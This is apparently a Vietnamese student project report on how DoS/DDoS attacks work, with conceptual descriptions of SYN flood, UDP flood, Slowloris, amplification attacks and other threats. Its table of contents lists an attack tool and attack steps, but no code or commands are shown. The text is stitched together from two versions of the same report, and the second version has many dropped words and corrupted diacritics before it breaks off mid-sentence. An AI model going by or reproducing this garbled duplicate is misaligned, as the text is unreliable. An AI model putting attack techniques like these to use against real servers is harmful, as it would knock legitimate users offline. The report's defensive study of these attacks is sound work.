MỞ ĐẦU Tấn công từ chối dịch vụ DDOS là cơn “ác mộng” dài tập thường kỳ của các tổ chức, doanh nghiệp không kể lớn hay nhỏ. Đáng buồn là hiện vẫn chưa có giải pháp ngăn chặn triệt để đối với kiểu tấn công khó chịu này, chúng ta chỉ có thể hạn chế phần nào thiệt hại hay giảm bớt cường độ tấn công mà thôi. Tấn công DDOS thường được thực hiện bởi hackers có tổ chức nhằm khủng bố không gian mạng, kiếm lợi nhuận hoặc đôi khi để cho vui. Trong năm 2020 khi ngày càng có nhiều trường học đang thực hiện đào tạo trực tuyến để đảm bảo an toàn cho học sinh trong đại dịch COVID19 thì các tổ chức giáo dục đã trở thành mục tiêu chính cho các cuộc tấn công từ chối dịch vụ (DDOS). Nhóm nghiên cứu của Kaspersky đã phân tích và so sánh các cuộc tấn công DDOS ảnh hưởng đến giáo dục trong tổng số các cuộc tấn công DDOS được Hệ thống DDOS Interlligence của Kaspersky phát hiện trong Quý I năm 2019 và Quý I năm 2020. Theo đó, số lượng các cuộc tấn công DDOS ảnh hưởng đến giáo dục tăng 550% trong tháng 12020 so với cùng kỳ năm 2019. Các nhà nghiên cứu cũng cảnh báo các mối đe dọa được ngụy trang dưới dạng các ứng dụng và nền tảng học tập trực tuyến như Blackboard, Zoom, Google Classroom, Cousera, edX và Google Meet. Ghi nhận từ hệ thống của Trung tâm Giám sát an toàn không gian mạng quốc gia (NCSC) thuộc Bộ Thông tin và Truyền thông cho thấy, trong tháng 122020, tổng số cuộc tấn công mạng vào các hệ thống thông tin tại Việt Nam dẫn đến sự cố là 315 cuộc. Trước tình hình đó nhóm chúng em quyết định tìm hiểu cơ chế tấn công, mô phỏng lại quá trình tấn công từ chối dịch vụ DDOS qua đó có thể đưa ra được các giải pháp ngăn chặn hoặc giảm thiểu tác hại mà nó gây ra.. Nhóm thực hiện LỜI CẢM ƠN Lời đầu tiên, chúng em xin cảm ơn các thầy cô tại Khoa Khoa học máy tính Đại học công nghệ thông tin và truyền thông Việt Hàn đã giảng dạy, truyền đạt cho chúng em những kiến thức nền tảng cơ bản, những kinh nghiệm thực tế, định hướng giúp đỡ chúng em trong quá trình học tập nghiên cứu tìm hiểu đề tài. Chúng em xin cảm ơn thầy Dương Hữu Ái đã trực tiếp hướng dẫn, thầy Nguyễn Anh Tuấn trực tiếp giảng dạy môn Lập trình mạng. Đã cung cấp kiến thức nền tảng các giao thức mạng, giải đáp các vướng mắc và đưa ra những lời khuyên, định hướng phát triển trong quá trình thực hiện triển khai đề tài. Trong quá trình thực hiện đề tài chúng em đã cố gắng hoàn thành trong phạm vi kiến thức mình tích lũy và học tập được, tuy nhiên để hiểu hết được các kiến thức đó chúng em cần phải nổ lực hơn nữa, dành nhiều thời gian nghiên cứu và cố gắng hơn. Trong quá trình làm đề tài vì kiến thức và kinh nghiệm còn ít nên chắc chắn không tránh khỏi những lỗi thiếu sót. Vì vậy chúng em rất mong nhận được sự góp ý chỉ bảo nhiều hơn từ phía các thầy, cô để chúng em có thể phát triển hơn nữa đề tài của mình, làm chủ kiến thức. Một lần nữa chúng em xin chân thành cảm ơn.. Nhóm thực hiện NHẬN XÉT …………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………… …………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………… …………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………… ……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………… Giảng viên hướng dẫn TS. Dương Hữu Ái MỤC LỤC Trang MỞ ĐẦU 3 Phần 1 Giới thiệu 8 1.1 Tổng quan an toàn mạng và tấn công mạng 8 1.1.1 Nguy cơ đe dọa an ninh, an toàn thông tin 8 1.1.2 Những vấn đề cần để đảm bảo an ninh và an toàn mạng 8 1.1.3 Đối tượng tấn công mạng 9 1.1.3 Các lỗ hổng trong bảo mật và phương thức tấn công mạng 9 1.2 Giới thiệu cách thức tấn công DOSDDOS 11 1.2.1 Các khái niệm trong tấn công DOSDDOS 11 1.2.2 Phân loại tấn công DOSDDOS 12 1.2.3 Sự khác biệt giữa DOS và DDOS 12 1.2.4 Các loại hình tấn công DOSDDOS phổ biến 14 1.2.5 Tác hại của tấn công DOSDDOS đối với hệ thống mạng 15 1.2.6 Vị trí nghiên cứu trong đề tài đối với mô hình mạng 17 1.3 Cấu trúc đồ án 18 Phần 2 Cơ sở lý thuyết 19 2.1 Các giao thức IP, TCP, UDP 19 2.2 Cơ chế hoạt động hình thức tấn công SYN Flood 22 2.3 Cơ chế hoạt động của hình thức tấn công UDP Flood 24 Phần 3 Giải quyết vấn đề 26 3.1 Phân tích yêu cầu 26 3.2 Xây dựng chương trình, công cụ DOSDDOS 26 3.2.1 Chương trình tấn công DOSDDOS (Code ) 26 3.2.2 Các bước thực hiện tấn công một Server 28 Phần 4 Kết quả thực hiện 30 4.1 Kết quả đạt được và đánh giá 30 4.2 Các giải pháp phòng chống DOSDDOS 31 PHỤ LỤC 33 DANH MỤC TÀI LIỆU THAM KHẢO 34 DANH MỤC HÌNH Hình 1 Internet Protocol 19 Hình 2 Giao thức truyền TCP 20 Hình 3 Giao thức truyền UDP 21 Hình 4 Cơ chế tấn công SYNFlood 23 Hình 5 Cơ chế tấn công UDP Flood 25 Hình 6 Quét cổng Active bằng Nmap 28 Hình 7 Nhập thông tin, lựa chọn giao thức và số packets cần send 29 Hình 8 Nhập thông tin và số packets cần send 29 Hình 9 Bandwidth của host sau khi DOS UDP Flood 30 Hình 10 Bandwidth của host sau khi DDOS SYN Attack 30 Phần 1 Giới thiệu 1.1 Tổng quan an toàn mạng và tấn công mạng 1.1.1 Nguy cơ đe dọa an ninh, an toàn thông tin Trong thời đại công nghệ, thông tin cá nhân và cơ sở dữ liệu ngày càng khó bảo đảm an toàn do sự xâm nhập của các hình thức tấn công mạng khác nhau. Trong đó có thể kể đến như truy cập trái phép, tấn công từ chối dịch vụ dẫn đến nguy cơ để lộ thông tin, gây hậu quả nghiệm trọng cho hệ thống hoặc thất thoát tài sản. Nguy cơ mất an toàn thông tin do nhiều nguyên nhân, đối tượng tấn công đa dạng… Thiệt hại từ những vụ tấn công mạng là rất lớn, đặc biệt là những thông tin thuộc lĩnh vực kinh tế, an ninh, quốc phòng… Do đó, việc xây dựng hàng rào kỹ thuật để ngăn chặn những truy cập trái phép trở thành nhu cầu cấp bách trong các hoạt động truyền thông. Theo số liệu thống kê về hiện trạng bảo mật mới nhất công bố của Symantec, Việt Nam đứng thứ 11 trên toàn cầu về các hoạt động đe dọa tấn công mạng. Những xu hướng đe dọa bảo mật ngày càng gia tăng nổi bật hiện nay mà các tổ chức tại Việt Nam cần quan tâm là: tấn công có chủ đích cao cấp, các mối đe dọa trên thiết bị di động, những vụ tấn công độc hại và mất cắp dữ liệu. Thực tế, nguy cơ mất an ninh an toàn mạng máy tính còn có thể phát sinh ngay từ bên trong. Nguy cơ mất an ninh từ bên trong xảy ra thường lớn hơn nhiều, nguyên nhân chính là do người sử dụng có quyền truy nhập hệ thống nắm được điểm yếu của hệ thống hay vô tình tạo cơ hội cho những đối tượng khác xâm nhập hệ thống. Sự phát triển không ngừng của lĩnh vực công nghệ thông tin đã tạo điều kiện thuận lợi cho mọi mặt của đời sống xã hội, bên cạnh những thuận lợi, thì nguy cơ về mất an toàn, bảo mật thông tin dữ liệu cũng tăng lên. Hệ thống máy tính luôn bị đe dọa bởi các nguy cơ mất an toàn. Chính vì thế chúng ta phải có các biện pháp bảo vệ hệ thống tránh khỏi các nguy cơ đó. 1.1.2 Những vấn đề cần để đảm bảo an ninh và an toàn mạng Vấn đề đầu tiên phải nói đến là dữ liệu, những thông tin lưu trữ trên hệ thống máy tính cần được bảo vệ do các yêu cầu về tính bảo mật, tính toàn vẹn hay tính kịp thời. Thông thường yêu cầu về bảo mật được coi là yêu cầu quan trọng đối với thông tin lưu trữ trên mạng. Tuy nhiên, ngay cả khi những thông tin không bí mật, thì yêu cầu về tính toàn vẹn cũng rất quan trọng. Không một cá nhân, một tổ chức nào lãng phí tài nguyên vật chất và thời gian để lưu trữ những thông tin mà không biết về tính đúng đắn của những thông tin đó. Vấn đề thứ hai là về tài nguyên hệ thống, sau khi những kẻ tấn công đã làm chủ được hệ thống chúng sẽ sử dụng các máy này để chạy các chương trình như dò tìm mật khẩu để tấn công vào hệ thống mạng. Vấn đề thứ ba là danh tiếng một khi dữ liệu bị đánh cắp thì việc nghi ngờ nhau trong tổ chức là điều không tránh khỏi, vì vậy sẽ ảnh hưởng đến danh tiếng của tổ chức rất nhiều. 1.1.3 Đối tượng tấn công mạng Là đối tượng sử dụng kỹ thuật về mạng để dò tìm các lỗ hổng bảo mật trên hệ thống để thực hiện xâm nhập và chiếm đoạt thông tin bất hợp pháp. Các đối tượng tấn công mạng: Hacker: Xâm nhập vào mạng trái phép bằng cách sử dụng các công cụ phá mật khẩu hoặc khai thác các điểm yếu của hệ thống. Masquerader: Giả mạo thông tin, địa chỉ IP, tên miền, định danh người dùng… Eavesdropping: Là đối tượng nghe trộm thông tin trên mạng để lấy cắp thông tin. 1.1.3 Các lỗ hổng trong bảo mật và phương thức tấn công mạng Các loại lỗ hổng bảo mật: Có thể phân theo 3 cấp độ Lỗ hổng loại A: Cảnh báo nguy hiểm cho phép người ngoài hệ thống có thể truy cập hợp pháp vào hệ thống dẫn đến phá hủy hệ thống. Những lỗ hổng này có sẵn trên phần mềm mà người quản trị không nhận biết. Lỗ hổng loại B: Mức độ nguy hiểm trung bình thường có trong các ứng dụng trên hệ thống. Lỗ hổng này cho phép người dùng nội bộ có thể chiếm được quyền cao hơn hay truy cập không hợp pháp. Lỗ hổng loại C: Mức độ nguy hiểm thấp chỉ ảnh hưởng tới chất lượng dịch vụ, ngưng trệ gián đoạn hệ thống không phá hỏng dữ liệu hoặc đoạt được quyền truy cập. Các hình thức tấn công mạng phổ biến 2020 SQL Injection Attack: Cuộc tấn công SQL injection đã trở thành một vấn đề phổ biến đối với các trang web dựa trên cơ sở dữ liệu. Các cuộc tấn công này xảy ra khi một truy vấn SQL được thực thi bởi tội phạm mạng và được cấp cho cơ sở dữ liệu, được chuyển từ máy khách đến máy chủ thông qua dữ liệu đầu vào. Lệnh SQL được đưa vào đầu vào mặt phẳng dữ liệu, thường thay vì mật khẩu hoặc thông tin đăng nhập. Điều này cho phép tội phạm mạng chạy các lệnh SQL được xác định trước của riêng chúng. Khi một cuộc tấn công SQL injection thành công, thông tin nhạy cảm có thể bị đọc, bị đánh cắp, sửa đổi, chèn, cập nhật hoặc xóa. Những kẻ tấn công mạng cũng có thể thực thi các quy trình quản trị, như tắt máy, trên cơ sở dữ liệu; khôi phục nội dung từ bất kỳ tệp nhất định nào; và thậm chí ra lệnh cho hệ điều hành. Phishing và Spear Phishing Attacks: Một cuộc tấn công lừa đảo đòi hỏi tội phạm mạng gửi các email có vẻ là từ các nguồn đáng tin cậy. Mục đích của kiểu tấn công này là lấy thông tin nhạy cảm của một người hoặc tác động họ làm điều gì đó. Chẳng hạn, nó có thể có một tệp đính kèm tải phần mềm độc hại xuống thiết bị khi được mở. Ngoài ra, nó có thể cung cấp một liên kết đến một trang web giả mạo để thuyết phục ai đó cung cấp thông tin của họ hoặc lừa họ tải xuống phần mềm độc hại. Spear phishing được nhắm mục tiêu nhiều hơn. Những cuộc tấn công này yêu cầu những kẻ tấn công tiến hành nghiên cứu các mục tiêu của chúng, để chúng có thể tạo ra một email cá nhân và phù hợp. Điều này làm cho việc chống lừa đảo bằng giáo rất khó chống lại . Ví dụ: trường “từ” trong email có thể là giả mạo, khiến người nhận tin rằng thư là từ một người nào đó mà họ biết; hoặc email có thể giả mạo là từ chủ nhân của một người, yêu cầu cấp tiền. Một kỹ thuật lừa đảo phổ biến khác là sao chép một trang web hợp pháp, do đó lừa một người nhập thông tin đăng nhập hoặc thông tin cá nhân của họ. Phần mềm độc hại: Là phần mềm không mong muốn được cài đặt trên hệ thống hoặc thiết bị của bạn mà bạn không biết hoặc không cho phép. Phần mềm độc hại thường xâm nhập vào hệ thống bằng cách gắn chính nó vào mã xác thực và lan truyền. Nó có thể ẩn trong các ứng dụng hoặc tự nhân bản qua internet (hệ thống hoặc trình lây nhiễm bản ghi khởi động, virus macro, trình lây nhiễm tệp, trojan, virus ẩn, bom logic, ransomware, phần mềm gián điệp, phần mềm quảng cáo, ...). Botnet: Mạng botnet bao gồm các máy tính hoặc thiết bị cá nhân hợp tác để đạt được một nhiệm vụ cụ thể . Gọi nó là “botnet” vì các chương trình này, còn được gọi là bot hoặc rô bốt, tồn tại trên một mạng thiết bị. Botnet được tội phạm mạng sử dụng để thúc đẩy một loạt các cuộc tấn công mạng. Chúng có thể giúp kẻ tấn công mạng tạo điều kiện cho một cuộc tấn công từ chối dịch vụ, chẳng hạn như tấn công làm ngập trang web với lưu lượng truy cập được thiết kế để đưa nó vào ngoại tuyến. Các cuộc tấn công như vậy có thể khiến doanh nghiệp thiệt hại hàng triệu đô la, tiền phạt và khách hàng. Botnet cũng được sử dụng để đánh cắp mật khẩu và thông tin nhạy cảm , phát tán thư rác và phát tán vi rút. Botnet là công cụ phổ biến cho tội phạm mạng vì chúng rẻ và hiệu quả . Để bảo vệ doanh nghiệp của bạn khỏi các mạng botnet, bạn nên sử dụng một giải pháp bảo mật CNTT toàn diện. Các cuộc tấn công tạo kịch bản trang web: Các cuộc tấn công tập lệnh trên nhiều trang web, còn được gọi là các cuộc tấn công XSS, sử dụng tài nguyên web của bên thứ ba để thực thi các tập lệnh trong chương trình có thể tập lệnh hoặc trình duyệt web của một người. Các cuộc tấn công XSS liên quan đến việc kẻ tấn công đưa một tải trọng bị nhiễm JavaScript độc hại vào cơ sở dữ liệu của trang web. Nếu nạn nhân dự định truy cập một trang trên trang web này, trang đó sẽ được truyền tải trọng như một phần của nội dung HTML. Điều này sau đó được truyền đến trình duyệt của nạn nhân dự định, trình duyệt này sẽ kích hoạt tập lệnh. Các cuộc tấn công DOSDDOS: Ở đây chúng ta sẽ tìm hiểu chi tiết về cơ chế tấn công và mô phỏng cuộc tấn công DOSDDOS 1.2 Giới thiệu cách thức tấn công DOSDDOS 1.2.1 Các khái niệm trong tấn công DOSDDOS DOS (Denial Of Service): Dịch ra tiếng Việt là từ chối dịch vụ. Tấn công từ chối dịch vụ DOS là cuộc tấn công nhằm làm sập một máy chủ hoặc mạng, khiến người dùng khác không thể truy cập vào máy chủ của mạng đó. Kẻ tấn công thực hiện điều này bằng cách gửi ồ ạt các yêu cầu hoặc gửi thông tin có thể kích hoạt sự cố đến máy chủ, hệ thống hoặc mạng mục tiêu, từ đó khiến người dùng hợp pháp (nhân viên, thành viên, chủ tài khoản) không thể truy cập dịch vụ, tài nguyên họ mong đợi. Mục đích cuối cùng là làm cho server không thể đáp ứng được các yêu cầu sử dụng dịch vụ từ các client. Nạn nhân của tấn công DOS thường là máy chủ web của các tổ chức cao cấp như ngân hàng, doanh nghiệp thương mại, tổ chức giáo dục, công ty truyền thông, các trang báo, mạng xã hội... Ví dụ, khi bạn nhập vào URL của một website vào trình duyệt, lúc đó bạn đang gửi một yêu cầu đến máy chủ của trang này để xem. Máy chủ chỉ có thể xử lý một số yêu cầu nhất định trong một khoảng thời gian, vì vậy nếu kẻ tấn công gửi ồ ạt nhiều yêu cầu đến máy chủ sẽ làm nó bị quá tải và yêu cầu của bạn không được xử lý. Đây là kiểu “từ chối dịch vụ” vì nó làm cho bạn không thể truy cập đến trang đó. Kẻ tấn công có thể sử dụng thư rác để thực hiện các tấn công tương tự trên tài khoản email của bạn. Dù bạn có một tài khoản email của trường, của công ty hay dùng dịch vụ miễn phí như Gmail thì vẫn bị giới hạn số lượng dữ liệu trong tài khoản. Bằng cách gửi nhiều email đến tài khoản của bạn, kẻ tấn công có thể làm đầy hòm thư đến và ngăn chặn bạn nhận được các mail khác. DDOS (Distributed Denial Of Service): Nghĩa tiếng Việt là từ chối dịch vụ phân tán. Tấn công DDOS là nỗ lực làm sập một dịch vụ trực tuyến bằng cách làm tràn ngập nó với các yêu cầu được gửi đến từ nhiều nguồn. Khi DDOS, kẻ tấn công có thể sử dụng máy tính của bạn để tấn công vào các máy tính khác. Bằng cách lợi dụng những lỗ hổng về bảo mật cũng như sự không hiểu biết, kẻ này có thể giành quyền điều khiển máy tính của bạn. Sau đó chúng sử dụng máy tính của bạn để gửi số lượng lớn dữ liệu đến một website hoặc gửi thư rác đến địa chỉ email nào đó. Đây là kiểu tấn công phân tán vì kẻ tấn công sử dụng nhiều máy tính, bao gồm có cả máy tính của bạn để thực hiện tấn công DOS. Mặc dù DDOS cung cấp một chế độ tấn công ít phức tạp hơn các dạng tấn công mạng khác, nhưng chúng đang ngày càng mạnh mẽ và tinh vi hơn. 1.2.2 Phân loại tấn công DOSDDOS Có ba loại tấn công cơ bản: Volume based attacks: Loại tấn công sử dụng lưu lượng truy cập cao để làm ngập băng thông mạng. Protocol attacks: Loại tấn công tập trung vào việc khai thác nguồn tài nguyên máy chủ. Application attacks: Tấn công nhắm vào các ứng dụng web và được coi là một loại tấn công tinh vi và nghiêm trọng nhất. 1.2.3 Sự khác biệt giữa DOS và DDOS Tấn công DOS nghĩa là một máy tính gửi một lượng lớn lưu lượng truy cập đến máy tính của nạn nhân và đánh sập nó. Tấn công DOS là một cuộc tấn công trực tuyến được sử dụng để làm cho trang web không khả dụng với người dùng, khi được thực hiện trên một trang web. Cuộc tấn công này làm cho máy chủ của một trang web được kết nối với Internet sập bằng cách gửi một lượng lớn lưu lượng truy cập đến nó. Còn trong cuộc tấn công DDOS, các cuộc tấn công được thực hiện từ nhiều địa điểm khác nhau bằng cách sử dụng nhiều hệ thống. Điểm khác biệt trong các cuộc tấn công như sau: DOS DDOS Chỉ một hệ thống nhắm mục tiêu vào hệ thống nạn nhân. Nhiều hệ thống tấn công hệ thống nạn nhân. PC bị nhắm mục tiêu được load từ gói dữ liệu gửi từ một vị trí duy nhất. Nhiều hệ thống tấn công hệ thống nạn nhân. Tấn công DOS chậm hơn so với DDOS. Tấn công DDOS nhanh hơn tấn công DOS. Có thể bị chặn dễ dàng vì chỉ sử dụng một hệ thống. Rất khó để ngăn chặn cuộc tấn công này vì nhiều thiết bị đang gửi gói tin và tấn công từ nhiều vị trí. Trong cuộc tấn công DOS, chỉ một thiết bị duy nhất được sử dụng với các công cụ tấn công DOS. Trong cuộc tấn công DDOS, nhiều bot được sử dụng để tấn công cùng một lúc. Các cuộc tấn công DOS rất dễ theo dõi. Các cuộc tấn công DDOS rất khó theo dõi. Lưu lượng truy cập trong cuộc tấn công DOS ít hơn so với DDOS. Các cuộc tấn công DDOS cho phép kẻ tấn công gửi một lượng lớn lưu lượng truy cập đến mạng nạn nhân. Các loại hình tấn công DOS 1. Tấn công tràn bộ đệm 2. Tấn công Ping of Death hoặc ICMP flood 3. Tấn công Teardrop Attack Các loại hình tấn công DDOS 1. Tấn công Volumetric 2. Tấn công Fragmentation Attack 3. Application Layer Attack 1.2.4 Các loại hình tấn công DOSDDOS phổ biến SYN Flood: Khai thác điểm yếu trong chuỗi kết nối TCP, được gọi là bắt tay ba chiều. Máy chủ sẽ nhận được một thông điệp đồng bộ (SYN) để bắt đầu bắt tay. Máy chủ nhận tin nhắn bằng cách gửi cờ báo nhận (ACK) tới máy lưu trữ ban đầu, sau đó đóng kết nối. Tuy nhiên, trong một SYN Flood, tin nhắn giả mạo được gửi đi và kết nối không đóng dẫn đến dịch vụ sập. UDP Flood: User Datagram Protocol (UDP) là một giao thức mạng không session ( không cần thiết lập kết nối). Một UDP Flood nhắm đến các cổng ngẫu nhiên trên máy tính hoặc mạng với các gói tin UDP. Máy chủ kiểm tra ứng dụng tại các cổng đó nhưng không tìm thấy ứng dụng nào. HTTP Flood: Gần giống như các yêu cầu GET hoặc POST hợp pháp được khai thác bởi một hacker. Nó sử dụng ít băng thông hơn các loại tấn công khác nhưng nó có thể buộc máy chủ sử dụng các nguồn lực tối đa. Ping of Death: Điều khiển các giao thức IP bằng cách gửi những đoạn mã độc đến một hệ thống. Đây là loại DDOS phổ biến cách đây hai thập kỷ nhưng đã không còn hiệu quả vào thời điểm hiện tại. Smurf Attack: Khai thác giao thức Internet (IP) và ICMP (Internet Control Message Protocol) sử dụng một chương trình phần mềm độc hại gọi là smurf. Nó giả mạo một địa chỉ IP và sử dụng ICMP, sau đó ping các địa chỉ IP trên một mạng nhất định. Fraggle Attack: Sử dụng một lượng lớn lưu lượng UDP vào mạng phát sóng của router. Nó giống như một cuộc tấn công Smurf, sử dụng UDP nhiều hơn là ICMP. Slowloris: Cho phép kẻ tấn công sử dụng nguồn lực tối thiểu trong một cuộc tấn công và các mục tiêu trên máy chủ web. Khi đã kết nối với mục tiêu mong muốn, Slowloris giữ liên kết đó mở càng lâu càng tốt với HTTP tràn ngập. Kiểu tấn công này đã được sử dụng trong một số DDOSing kiểu hacktivist (tấn công vì mục tiêu chính trị) cao cấp, bao gồm cuộc bầu cử tổng thống Iran năm 2009. Việc giảm thiểu ảnh hưởng với loại hình tấn công này là rất khó khăn. Application Layer Attacks: Khai thác lỗ hổng trong các ứng dụng. Mục tiêu của loại tấn công này không phải là toàn bộ máy chủ, mà là các ứng dụng với những điểm yếu được biết đến. NTP Amplification: Khai thác các máy chủ NTP (Network Time Protocol), một giao thức được sử dụng để đồng bộ thời gian mạng, làm tràn ngập lưu lượng UDP. Đây là reflection attack bị khuếch đại. Trong reflection attack bất kỳ nào đều sẽ có phản hồi từ máy chủ đến IP giả mạo, khi bị khuếch đại, thì phản hồi từ máy chủ sẽ không còn tương xứng với yêu cầu ban đầu. Vì sử dụng băng thông lớn khi bị DDOS nên loại tấn công này có tính phá hoại và volumne cao. Advanced Persistent DOS (APDOS): Là một loại tấn công được sử dụng bởi hacker với mong muốn gây ra những thiệt hại nghiêm trọng. Nó sử dụng nhiều kiểu tấn công được đề cập trước đó HTTP Flood, SYN Flood, v.v...) và thường nhắm tấn công theo kiểu gửi hàng triệu yêu cầugiây. Các cuộc tấn công của APDOS có thể kéo dài hàng tuần, phụ thuộc vào khả năng của hacker để chuyển đổi các chiến thuật bất cứ lúc nào và tạo ra sự đa dạng để tránh các bảo vệ an ninh. Zeroday DDOS Attacks: Là tên được đặt cho các phương pháp tấn công DDOS mới, khai thác các lỗ hổng chưa được vá. HTTP GET: Là một kiểu tấn công lớp ứng dụng (Application Layer attack), quy mô nhỏ hơn và được nhắm tới những mục tiêu hơn. Application Level Attacks khai thác lỗ hổng trong các ứng dụng. Mục tiêu của loại tấn công này không phải là toàn bộ máy chủ, mà là các ứng dụng với những điểm yếu được biết đến. Kiểu tấn công này sẽ nhắm vào Lớp thứ 7 trong mô hình OSI. Đây là lớp có lưu lượng mạng cao nhất, thay vì hướng vào lớp thứ 3 thường được chọn làm mục tiêu trong các cuộc tấn công Bulk Volumetric. HTTP GET khai thác quy trình trình của một trình duyệt web hoặc ứng dụng HTTP nào đó và yêu cầu một ứng dụng hoặc máy chủ cho mỗi yêu cầu HTTP, đó là GET hoặc POST. HTTP Flood: Gần giống như các yêu cầu GET hoặc POST hợp pháp được khai thác bởi một hacker. Nó sử dụng ít băng thông hơn các loại tấn công khác nhưng nó có thể buộc máy chủ sử dụng các nguồn lực tối đa. Rất khó để chống lại kiểu tấn công này vì chúng sử dụng các yêu cầu URL tiêu chuẩn, thay vì các tập lệnh bị hỏng hoặc khối lượng lớn.
ĐẠI HỌC ĐÀ NẴNG KHOA KHOA HỌC MÁY TÍNH ĐỒ ÁN CƠ SỞ ĐỀ TÀI: TÌM HIỂU CƠ CHẾ VÀ MÔ PHỎNG CÔNG CỤ TẤN CÔNG DOS/DDOS Giảng viên hướng dẫn : TS DƯƠNG HỮU ÁI Sinh viên thực : PHÙNG MINH HIẾU TRƯƠNG THANH HOÀI : 18IT5 Lớp Đà Nẵng, tháng 12 năm 2020 MSSV:18IT273 MSSV:18IT274 ĐẠI HỌC ĐÀ NẴNG KHOA KHOA HỌC MÁY TÍNH ĐỒ ÁN CƠ SỞ ĐỀ TÀI: TÌM HIỂU CƠ CHẾ VÀ MÔ PHỎNG CÔNG CỤ TẤN CÔNG DOS/DDOS MỞ ĐẦU Tấn công từ chối dịch vụ DDOS “ác mộng” dài tập thường kỳ tổ chức, doanh nghiệp không kể lớn hay nhỏ Đáng buồn chưa có giải pháp ngăn chặn triệt để kiểu cơng khó chịu này, hạn chế phần thiệt hại hay giảm bớt cường độ công mà Tấn công DDOS thường thực hackers có tổ chức nhằm khủng bố không gian mạng, kiếm lợi nhuận vui Trong năm 2020 ngày có nhiều trường học thực đào tạo trực tuyến để đảm bảo an toàn cho học sinh đại dịch COVID-19 tổ chức giáo dục trở thành mục tiêu cho cơng từ chối dịch vụ (DDOS) Nhóm nghiên cứu Kaspersky phân tích so sánh cơng DDOS ảnh hưởng đến giáo dục tổng số công DDOS Hệ thống DDOS Interlligence Kaspersky phát Quý I năm 2019 Quý I năm 2020 Theo đó, số lượng cơng DDOS ảnh hưởng đến giáo dục tăng 550% tháng 1/2020 so với kỳ năm 2019 Các nhà nghiên cứu cảnh báo mối đe dọa ngụy trang dạng ứng dụng tảng học tập trực tuyến Blackboard, Zoom, Google Classroom, Cousera, edX Google Meet Ghi nhận từ hệ thống Trung tâm Giám sát an tồn khơng gian mạng quốc gia (NCSC) thuộc Bộ Thông tin Truyền thông cho thấy, tháng 12/2020, tổng số công mạng vào hệ thống thông tin Việt Nam dẫn đến cố 315 Trước tình hình nhóm chúng em định tìm hiểu chế cơng, mơ lại q trình cơng từ chối dịch vụ DDOS qua đưa giải pháp ngăn chặn giảm thiểu tác hại mà gây ra./ Nhóm thực LỜI CẢM ƠN Lời đầu tiên, chúng em xin cảm ơn thầy cô Khoa Khoa học máy tính - Đại học cơng nghệ thông tin truyền thông Việt - Hàn giảng dạy, truyền đạt cho chúng em kiến thức tảng bản, kinh nghiệm thực tế, định hướng giúp đỡ chúng em trình học tập nghiên cứu tìm hiểu đề tài Chúng em xin cảm ơn thầy Dương Hữu Ái trực tiếp hướng dẫn, thầy Nguyễn Anh Tuấn trực tiếp giảng dạy môn Lập trình mạng Đã cung cấp kiến thức tảng giao thức mạng, giải đáp vướng mắc đưa lời khuyên, định hướng phát triển trình thực triển khai đề tài Trong trình thực đề tài chúng em cố gắng hoàn thành phạm vi kiến thức tích lũy học tập được, nhiên để hiểu hết kiến thức chúng em cần phải nổ lực nữa, dành nhiều thời gian nghiên cứu cố gắng Trong trình làm đề tài kiến thức kinh nghiệm cịn nên chắn khơng tránh khỏi lỗi thiếu sót Vì chúng em mong nhận góp ý bảo nhiều từ phía thầy, để chúng em phát triển đề tài mình, làm chủ kiến thức Một lần chúng em xin chân thành cảm ơn./ Nhóm thực NHẬN XÉT ………………………………………………………………………………………………… ………………………………………………………………………………………………… ………………………………………………………………………………………………… ………………………………………………………………………………………………… ………………………………………………………………………………………………… ………………………………………………………………………………………………… ………………………………………………………………………………………………… ………………………………………………………………………………………………… ………………………………………………………………………………………………… ………………………………………………………………………………………………… ………………………………………………………………………………………………… ………………………………………………………………………………………………… ………………………………………………………………………………………………… ………………………………………………………………………………………………… ………………………………………………………………………………………………… ………………………………………………………………………………………………… ………………………………………………………………………………………………… ………………………………………………………………………………………………… Giảng viên hướng dẫn TS Dương Hữu Ái MỤC LỤC Trang DANH MỤC HÌNH Phần Giới thiệu 1.1 Tổng quan an toàn mạng công mạng 1.1.1 Nguy đe dọa an ninh, an tồn thơng tin Trong thời đại cơng nghệ, thơng tin cá nhân sở liệu ngày khó bảo đảm an tồn xâm nhập hình thức cơng mạng khác Trong kể đến truy cập trái phép, công từ chối dịch vụ dẫn đến nguy để lộ thông tin, gây hậu nghiệm trọng cho hệ thống thất thoát tài sản Nguy an tồn thơng tin nhiều ngun nhân, đối tượng công đa dạng… Thiệt hại từ vụ công mạng lớn, đặc biệt thông tin thuộc lĩnh vực kinh tế, an ninh, quốc phòng… Do đó, việc xây dựng hàng rào kỹ thuật để ngăn chặn truy cập trái phép trở thành nhu cầu cấp bách hoạt động truyền thông Theo số liệu thống kê trạng bảo mật công bố Symantec, Việt Nam đứng thứ 11 tồn cầu hoạt động đe dọa cơng mạng Những xu hướng đe dọa bảo mật ngày gia tăng bật mà tổ chức Việt Nam cần quan tâm là: cơng có chủ đích cao cấp, mối đe dọa thiết bị di động, vụ công độc hại cắp liệu Thực tế, nguy an ninh an tồn mạng máy tính cịn phát sinh từ bên Nguy an ninh từ bên xảy thường lớn nhiều, nguyên nhân người sử dụng có quyền truy nhập hệ thống nắm điểm yếu hệ thống hay vơ tình tạo hội cho đối tượng khác xâm nhập hệ thống Sự phát triển không ngừng lĩnh vực công nghệ thông tin tạo điều kiện thuận lợi cho mặt đời sống xã hội, bên cạnh thuận lợi, nguy an tồn, bảo mật thơng tin liệu tăng lên Hệ thống máy tính ln bị đe dọa nguy an tồn Chính phải có biện pháp bảo vệ hệ thống tránh khỏi nguy 1.1.2 Những vấn đề cần để đảm bảo an ninh an toàn mạng Vấn đề phải nói đến liệu, thông tin lưu trữ hệ thống máy tính cần bảo vệ yêu cầu tính bảo mật, tính tồn vẹn hay tính kịp thời Thông thường yêu cầu bảo mật coi yêu cầu quan trọng thông tin lưu trữ mạng Tuy nhiên, thông tin khơng bí mật, u cầu tính tồn vẹn quan trọng Không cá nhân, tổ chức lãng phí tài nguyên vật chất thời gian để lưu trữ thông tin mà tính đắn thơng tin Vấn đề thứ hai tài nguyên hệ thống, sau kẻ công làm chủ hệ thống chúng sử dụng máy để chạy chương trình dị tìm mật để công vào hệ thống mạng Vấn đề thứ 